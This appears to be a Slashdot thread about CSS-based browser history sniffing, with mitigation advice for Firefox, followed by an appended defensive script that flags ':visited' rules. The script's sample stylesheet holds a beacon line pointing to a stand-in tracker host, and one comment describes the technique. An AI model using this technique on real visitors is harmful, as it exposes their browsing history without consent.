Your Browser History Is Showing
tiffanydanica writes "For a lot of us our browser history is something we consider private, or at least not something we want to expose to every website we visit. Web2.0collage is showing just how easy it is (with code!) for sites to determine what sites you visit. When you visit the site it sniffs your browser history, and creates a collage of the (safe for work) sites that you visit. It is an interesting application of potentially scary technology (imagine a job application site using this to screen candidates). You can jump right into having your history sniffed if you so desire. While the collages are cool on their own merit, they also serve as an illustration of the privacy implications of browser history sniffing."
Not mine (Score:5, Informative)
No Script baby
It's slashdotted (Score:4, Informative)
Re:Microsoft actually did something right (Score:5, Informative)
I'm using FF 3.0.11 on Jaunty with history disabled, and it did not get anything from my browser even though the "recently closed tabs" menu has many entries in it. All I got was a black square. I also had to tell NoScript to allow their domain. This made me feel better about my paranoid ways!
Re:This methodology is actually quite old (Score:4, Informative)
New about:config setting in FF 3.5:
layout.css.visited_links_enabled [mozilla.org]
If "visited" is a useful feature for you check out SafeHistory [mozilla.org]:
Restricts the marking of visited links on the basis of the originating document, defending against web privacy attacks that remote sites can use to determine your browser history at other sites
Known since at least 2006 (Score:5, Informative)
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html [blogspot.com]
Of course there is no reason this is still not fixed (by being able to disable a:visited style).
Re:Did not work for me (Score:4, Informative)
Eh, noscript has become adware in the last year.
This is an out-dated claim: http://hackademix.net/2009/05/04/dear-adblock-plus-and-noscript-users-dear-mozilla-community/ [hackademix.net] It pertains to an ugly episode for which the NoScript author is rightfully apologetic.
It's a curious phenomenon, how the mind closes once a certain type of conclusion has been reached. This is the phenomenon that led to the NoScript/AdBlock war, and it seems entirely unfruitful to emulate exactly the kind of thinking that caused the issue in the first place.
Re:...So.... (Score:3, Informative)
This has been known for several years, and none of the browsers have done anything to fix it.
Re:Not mine (Score:5, Informative)
Re:...So.... (Score:5, Informative)
Re:...So.... (Score:4, Informative)
It's less invasive than being able to wholesale dump the browser history (you don't know when the sites were visited, for example), but protecting against it also means disabling functionality (you'd need to prevent an app from being able to tell whether or not a link on its own page has been clicked via CSS rules or other means, which means either disabling the distinction between visited or not completely or disabling reading back style information and/or preventing setting CSS rules that trigger loading of external resources).
workaround in firefox (Score:5, Informative)
in firefox:
set layout.css.visited_links_enabled to FALSE in about:config
This will break (a tiny part of) the layout of sites that use CSS to change the style of links that were visited by the user, but it protects against this problem.
Re:Not mine (Score:3, Informative)
I third it. I never browse at work.
Re:...So.... (Score:1, Informative)
Re:Known since at least 2006 (Score:2, Informative)
Bugzilla bug 57351 was reported in October of 2000:
https://bugzilla.mozilla.org/show_bug.cgi?id=57351 [mozilla.org]
(Bugzilla may or may not still hate Slashdot, copy and paste if clicking the link does not work).
Re:Microsoft actually did something right (Score:2, Informative)
Re:Not mine (Score:2, Informative)
Both use the same overall technique, which is that browsers display visited links differently to unvisited links. The JS implementation trawls a set of links looking for particular markers in the font colour or size, and the CSS implementation uses "a:visited {background-image:...}" to trick the browser into telling the server which links are visited and which are not.
The Link Status extension for FF3.5 can disable the :visited pseudo-class, preventing both methods from working.
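An added example, not part of the thread or of any site's code: a defensive audit of the CSS variant described above, which scans stylesheet text and reports every `:visited` rule whose declarations reference a `url(...)` and so could trigger a request. The function name `findVisitedLeaks`, the sample stylesheet and the `tracker.example` host are constructed for illustration.

```javascript
// Added example: flag :visited rules that can make the browser fetch a URL.
// Simplified parser (assumption): braces or semicolons inside quoted strings
// or url() values are not handled.
function findVisitedLeaks(cssText) {
  const findings = [];
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  // Matches innermost "selector { declarations }" blocks, so rules nested
  // inside @media are examined too.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selectors = m[1].split(",").map(s => s.trim())
      .filter(s => /:visited\b/i.test(s));
    if (selectors.length === 0) continue;
    for (const decl of m[2].split(";")) {
      const idx = decl.indexOf(":");
      if (idx < 0) continue;
      const property = decl.slice(0, idx).trim().toLowerCase();
      const value = decl.slice(idx + 1).trim();
      const url = /url\(\s*['"]?([^'")]*)['"]?\s*\)/i.exec(value);
      if (!url) continue; // colour-only :visited styling loads nothing
      for (const selector of selectors) {
        findings.push({ selector, property, url: url[1] });
      }
    }
  }
  return findings;
}

// Constructed sample stylesheet, not taken from any real site.
const SAMPLE_CSS = `
/* constructed sample */
a { color: blue; }
a:visited { color: purple; }
a#bank:visited { background-image: url("https://tracker.example/hit?site=bank"); }
@media screen {
  li a:visited, li a:hover { list-style-image: url(/v.gif) }
}
`;

for (const f of findVisitedLeaks(SAMPLE_CSS)) {
  console.log(`${f.selector}: ${f.property} -> ${f.url}`);
}
```

The plain `a:visited { color: purple; }` rule is not reported, since it loads nothing; only rules that pair `:visited` with a fetchable resource are.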